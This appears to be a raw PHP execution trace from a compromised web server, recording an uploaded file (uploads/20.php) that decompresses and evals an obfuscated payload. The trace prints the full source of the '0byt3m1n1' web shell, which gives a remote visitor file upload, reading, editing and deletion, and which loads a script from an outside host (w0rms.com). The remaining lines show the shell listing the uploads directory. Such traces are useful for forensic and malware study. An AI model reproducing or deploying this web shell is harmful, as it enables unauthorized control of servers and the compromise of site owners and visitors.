3 13 R 'x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\026\004�\021��*\037C'
3 14 0 0.001336 404072 gzuncompress 0 /var/www/html/uploads/20.php(5) : eval()'d code 1 1 'x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\026\004�\021��*\037C'
3 14 1 0.001460 412296
3 14 R '<?php\r\n\r\necho \'<script src=http://w0rms.com/kaydet.php></script>\';\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nif(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}}\r\n?>\r\n<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>\r\n<link href=\'https://fonts.googleapis.com/css?family=VT323\' rel=\'stylesheet\'>\r\n<style type="text/css">body{background: #263238;color:#eceff1;font-family:\'Courier\';margin:0;fon'
3 15 0 0.001732 462352 eval 1 '?><?php\r\n\r\necho \'<script src=http://w0rms.com/kaydet.php></script>\';\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nif(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}}\r\n?>\r\n<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>\r\n<link href=\'https://fonts.googleapis.com/css?family=VT323\' rel=\'stylesheet\'>\r\n<style type="text/css">body{background: #263238;color:#eceff1;font-family:\'Courier\';margin:0;font-size: 14px;}h1{font-family:\'VT323\';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:\'Courier\'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>\r\n</head><body> <?php echo\'<div style="color:#ef6c00;margin-top:0;"><h1><center>0byt3m1n1</center></h1></div>\';\r\nif(isset($_GET[\'path\'])) {$path = $_GET[\'path\'];chdir($_GET[\'path\']);} else {$path = getcwd();}\r\n$path = str_replace("\\\\","/",$path);$paths = explode("/", $path);\r\necho \'<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>\';echo "<font style=\'font-size:13px;\'>Path: ";\r\nforeach($paths as $id => $pat) {echo "<a style=\'font-size:13px;\' href=\'?path=";\r\nfor($i = 0; $i <= $id; $i++) {echo $paths[$i];\r\nif($i != $id) {echo "/";} }echo "\'>$pat</a>/";}\r\necho \'<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"/>\r\n<input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<center><font color="#00ff00">Upload OK!.</font></center><br/>\';}\r\nelse{echo \'<center><font color="red">Upload Failed!.</font></center><br/>\';}}\r\necho \'</td></tr><tr><td></table>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho \'<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';echo "".basename($_GET[\'filesrc\']);"";echo \'</tr></td></table><br />\';echo("<center><textarea readonly=\'\'>".htmlspecialchars(file_get_contents($_GET[\'filesrc\']))."</textarea></center>");}\r\nelseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\nif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<center><font color="#00ff00">Rename OK!</font></center><br />\';\r\n}else{\r\necho \'<center><font color="red">Rename Failed!</font></center><br />\';\r\n} $_POST[\'name\'] = $_POST[\'newname\'];}\r\necho \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\'.$_POST[\'name\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>\';\r\n}elseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');if(fwrite($fp,$_POST[\'src\'])){echo \'<center><font color="#00ff00">Edit File OK!.</font></center><br />\';\r\n}else{echo \'<center><font color="red">Edit File Failed!.</font></center><br />\';}fclose($fp);}\r\necho \'<form method="POST"><textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br /><input type="hidden" name="path" value="\'.$_POST[\'path\'].\'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>\';}echo \'</center>\';}else{echo \'</table><br /><center>\';\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'<center><font color="#00ff00">Dir Deleted!</font></center><br />\';\r\n}else{echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';}\r\n}elseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){echo \'<font color="#00ff00">Delete File Done.</font><br />\';}else{\r\necho \'<font color="red">Delete File Error.</font><br />\';}}}echo \'</center>\';\r\n$scandir = scandir($path);\r\necho \'<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first">\r\n<th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th>\r\n<th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>\';\r\nforeach($scandir as $dir){\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\necho "<tr><td>[D] <a href=\\"?path=$path/$dir\\">$dir</a></td><td><center>--</center></td><td><center>";\r\nif(is_writable("$path/$dir")) echo \'<font color="#00ff00">\';\r\nelseif(!is_readable("$path/$dir")) echo \'<font color="red">\';\r\necho perms("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</font>\';\r\necho"</center></td><td><center>".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "</center></td>\r\n<td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\"><input type=\\"submit\\" value=\\"+\\" /></form></center></td></tr>";}\r\nforeach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024;\r\n$size = round($size,3);if($size >= 1024){$size = round($size/1024,2).\' MB\';}else{$size = $size.\' KB\';}\r\necho "<tr><td>[F] <a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td><td><center>".$size."</center></td><td><center>";\r\nif(is_writable("$path/$file")) echo \'<font color="#00ff00">\';\r\nelseif(!is_readable("$path/$file")) echo \'<font color="red">\';\r\necho perms("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</font>\';\r\necho"</center></td><td><center>".date("d-M-Y H:i",filemtime("$path/$file"))."";\r\necho "</center></td><td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option><option value=\\"edit\\">Edit</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"file\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\"><input type=\\"submit\\" value=\\"+\\" /></form></center></td></tr>";}\r\necho \'</table></div>\';}echo \'</body></html>\';\r\nfunction perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = \'s\';} elseif (($perms & 0xA000) == 0xA000) {$info = \'l\';} elseif (($perms & 0x8000) == 0x8000) {$info = \'-\';} elseif (($perms & 0x6000) == 0x6000) {$info = \'b\';} elseif (($perms & 0x4000) == 0x4000) {$info = \'d\';} elseif (($perms & 0x2000) == 0x2000) {$info = \'c\';} elseif (($perms & 0x1000) == 0x1000) {$info = \'p\';} else {$info = \'u\';} $info .= (($perms & 0x0100) ? \'r\' : \'-\');$info .= (($perms & 0x0080) ? \'w\' : \'-\');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\' ) : (($perms & 0x0800) ? \'S\' : \'-\'));$info .= (($perms & 0x0020) ? \'r\' : \'-\');$info .= (($perms & 0x0010) ? \'w\' : \'-\');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\' ) : (($perms & 0x0400) ? \'S\' : \'-\'));$info .= (($perms & 0x0004) ? \'r\' : \'-\');$info .= (($perms & 0x0002) ? \'w\' : \'-\');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\' ) : (($perms & 0x0200) ? \'T\' : \'-\'));return $info;}\r\necho\'<br><center>© 2017 - <a href="http://zerobyte.id/">ZeroByte.ID</a> Recoded from Kodong.</center><br>\';?>' /var/www/html/uploads/20.php(5) : eval()'d code 1 0
4 16 0 0.001898 462352 set_time_limit 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 4 1 0
4 16 1 0.001917 462416
4 16 R FALSE
4 17 0 0.001931 462384 error_reporting 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 5 1 0
4 17 1 0.001946 462424
4 17 R 22527
4 18 0 0.001959 462384 get_magic_quotes_gpc 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 6 0
4 18 1 0.001972 462384
4 18 R FALSE
4 19 0 0.001986 462384 getcwd 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 12 0
4 19 1 0.002001 462432
4 19 R '/var/www/html/uploads'
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 12 $path = '/var/www/html/uploads'
4 20 0 0.002032 462432 str_replace 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 13 3 '\\' '/' '/var/www/html/uploads'
4 20 1 0.002048 462528
4 20 R '/var/www/html/uploads'
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 13 $path = '/var/www/html/uploads'
4 21 0 0.002073 462432 explode 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 13 2 '/' '/var/www/html/uploads'
4 21 1 0.002089 463008
4 21 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 13 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 15 $id = 0
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i = 0
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 15 $id = 1
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i = 0
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 15 $id = 2
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i = 0
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 15 $id = 3
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i = 0
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 15 $id = 4
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i = 0
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 16 $i++
4 22 0 0.002374 462936 scandir 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 51 1 '/var/www/html/uploads'
4 22 1 0.002409 463552
4 22 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '20.php', 4 => 'data', 5 => 'prepend.php']
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 51 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '20.php', 4 => 'data', 5 => 'prepend.php']
4 23 0 0.002448 463568 is_dir 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 56 1 '/var/www/html/uploads/.'
4 23 1 0.002466 463632
4 23 R TRUE
4 24 0 0.002480 463600 is_dir 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 56 1 '/var/www/html/uploads/..'
4 24 1 0.002495 463648
4 24 R TRUE
4 25 0 0.002509 463608 is_dir 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 56 1 '/var/www/html/uploads/.htaccess'
4 25 1 0.002524 463648
4 25 R FALSE
4 26 0 0.002538 463608 is_dir 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 56 1 '/var/www/html/uploads/20.php'
4 26 1 0.002553 463648
4 26 R FALSE
4 27 0 0.002566 463608 is_dir 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 56 1 '/var/www/html/uploads/data'
4 27 1 0.002581 463648
4 27 R TRUE
4 28 0 0.002595 463608 is_writable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 58 1 '/var/www/html/uploads/data'
4 28 1 0.002612 463648
4 28 R TRUE
4 29 0 0.002626 463608 perms 1 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 60 1 '/var/www/html/uploads/data'
5 30 0 0.002639 463608 fileperms 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 1 '/var/www/html/uploads/data'
5 30 1 0.002653 463648
5 30 R 16895
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $perms = 16895
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info = 'd'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'r'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'w'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'x'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'r'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'w'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'x'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'r'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'w'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'x'
4 29 1 0.002782 463648
4 29 R 'drwxrwxrwx'
4 31 0 0.002796 463608 is_writable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 61 1 '/var/www/html/uploads/data'
4 31 1 0.002813 463648
4 31 R TRUE
4 32 0 0.002826 463608 filemtime 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 62 1 '/var/www/html/uploads/data'
4 32 1 0.002840 463648
4 32 R 1676251645
4 33 0 0.002853 463552 date 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 62 2 'd-M-Y H:i' 1676251645
4 33 1 0.002909 465944
4 33 R '12-Feb-2023 20:27'
4 34 0 0.002928 465680 is_dir 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 56 1 '/var/www/html/uploads/prepend.php'
4 34 1 0.002946 465728
4 34 R FALSE
4 35 0 0.002960 465672 is_file 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 64 1 '/var/www/html/uploads/.'
4 35 1 0.002975 465696
4 35 R FALSE
4 36 0 0.002988 465664 is_file 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 64 1 '/var/www/html/uploads/..'
4 36 1 0.003004 465712
4 36 R FALSE
4 37 0 0.003017 465672 is_file 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 64 1 '/var/www/html/uploads/.htaccess'
4 37 1 0.003032 465712
4 37 R TRUE
4 38 0 0.003045 465672 filesize 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 64 1 '/var/www/html/uploads/.htaccess'
4 38 1 0.003058 465712
4 38 R 64
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 64 $size = 0.0625
4 39 0 0.003083 465616 round 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 65 2 0.0625 3
4 39 1 0.003098 465688
4 39 R 0.063
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 65 $size = 0.063
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 65 $size = '0.063 KB'
4 40 0 0.003135 465712 is_writable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 67 1 '/var/www/html/uploads/.htaccess'
4 40 1 0.003152 465752
4 40 R FALSE
4 41 0 0.003165 465712 is_readable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 68 1 '/var/www/html/uploads/.htaccess'
4 41 1 0.003181 465752
4 41 R TRUE
4 42 0 0.003194 465712 perms 1 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 69 1 '/var/www/html/uploads/.htaccess'
5 43 0 0.003207 465712 fileperms 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 1 '/var/www/html/uploads/.htaccess'
5 43 1 0.003221 465752
5 43 R 33188
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $perms = 33188
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info = '-'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'r'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'w'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= '-'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'r'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= '-'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= '-'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'r'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= '-'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= '-'
4 42 1 0.003341 465752
4 42 R '-rw-r--r--'
4 44 0 0.003354 465712 is_writable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 70 1 '/var/www/html/uploads/.htaccess'
4 44 1 0.003375 465752
4 44 R FALSE
4 45 0 0.003388 465712 is_readable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 70 1 '/var/www/html/uploads/.htaccess'
4 45 1 0.003403 465752
4 45 R TRUE
4 46 0 0.003416 465712 filemtime 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 71 1 '/var/www/html/uploads/.htaccess'
4 46 1 0.003429 465752
4 46 R 1676251645
4 47 0 0.003443 465656 date 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 71 2 'd-M-Y H:i' 1676251645
4 47 1 0.003475 465984
4 47 R '12-Feb-2023 20:27'
4 48 0 0.003490 465712 is_file 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 64 1 '/var/www/html/uploads/20.php'
4 48 1 0.003505 465752
4 48 R TRUE
4 49 0 0.003518 465712 filesize 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 64 1 '/var/www/html/uploads/20.php'
4 49 1 0.003531 465752
4 49 R 3647
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 64 $size = 3.5615234375
4 50 0 0.003562 465616 round 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 65 2 3.5615234375 3
4 50 1 0.003576 465688
4 50 R 3.562
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 65 $size = 3.562
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 65 $size = '3.562 KB'
4 51 0 0.003613 465712 is_writable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 67 1 '/var/www/html/uploads/20.php'
4 51 1 0.003630 465752
4 51 R FALSE
4 52 0 0.003643 465712 is_readable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 68 1 '/var/www/html/uploads/20.php'
4 52 1 0.003658 465752
4 52 R TRUE
4 53 0 0.003671 465712 perms 1 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 69 1 '/var/www/html/uploads/20.php'
5 54 0 0.003684 465712 fileperms 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 1 '/var/www/html/uploads/20.php'
5 54 1 0.003698 465752
5 54 R 33204
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $perms = 33204
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info = '-'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'r'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'w'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= '-'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'r'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'w'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= '-'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'r'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= '-'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= '-'
4 53 1 0.003819 465752
4 53 R '-rw-rw-r--'
4 55 0 0.003833 465712 is_writable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 70 1 '/var/www/html/uploads/20.php'
4 55 1 0.003849 465752
4 55 R FALSE
4 56 0 0.003862 465712 is_readable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 70 1 '/var/www/html/uploads/20.php'
4 56 1 0.003877 465752
4 56 R TRUE
4 57 0 0.003890 465712 filemtime 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 71 1 '/var/www/html/uploads/20.php'
4 57 1 0.003903 465752
4 57 R 1676251645
4 58 0 0.003915 465656 date 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 71 2 'd-M-Y H:i' 1676251645
4 58 1 0.003947 465984
4 58 R '12-Feb-2023 20:27'
4 59 0 0.003962 465712 is_file 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 64 1 '/var/www/html/uploads/data'
4 59 1 0.003978 465752
4 59 R FALSE
4 60 0 0.003991 465720 is_file 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 64 1 '/var/www/html/uploads/prepend.php'
4 60 1 0.004007 465768
4 60 R TRUE
4 61 0 0.004020 465728 filesize 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 64 1 '/var/www/html/uploads/prepend.php'
4 61 1 0.004034 465768
4 61 R 57
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 64 $size = 0.0556640625
4 62 0 0.004107 465624 round 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 65 2 0.0556640625 3
4 62 1 0.004122 465696
4 62 R 0.056
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 65 $size = 0.056
3 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 65 $size = '0.056 KB'
4 63 0 0.004165 465728 is_writable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 67 1 '/var/www/html/uploads/prepend.php'
4 63 1 0.004183 465768
4 63 R FALSE
4 64 0 0.004197 465728 is_readable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 68 1 '/var/www/html/uploads/prepend.php'
4 64 1 0.004213 465768
4 64 R TRUE
4 65 0 0.004226 465728 perms 1 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 69 1 '/var/www/html/uploads/prepend.php'
5 66 0 0.004240 465728 fileperms 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 1 '/var/www/html/uploads/prepend.php'
5 66 1 0.004253 465768
5 66 R 33261
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $perms = 33261
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info = '-'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'r'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'w'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'x'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'r'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= '-'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'x'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'r'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= '-'
4 A /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 74 $info .= 'x'
4 65 1 0.004377 465768
4 65 R '-rwxr-xr-x'
4 67 0 0.004391 465728 is_writable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 70 1 '/var/www/html/uploads/prepend.php'
4 67 1 0.004408 465768
4 67 R FALSE
4 68 0 0.004421 465728 is_readable 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 70 1 '/var/www/html/uploads/prepend.php'
4 68 1 0.004437 465768
4 68 R TRUE
4 69 0 0.004449 465728 filemtime 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 71 1 '/var/www/html/uploads/prepend.php'
4 69 1 0.004463 465768
4 69 R 1676251645
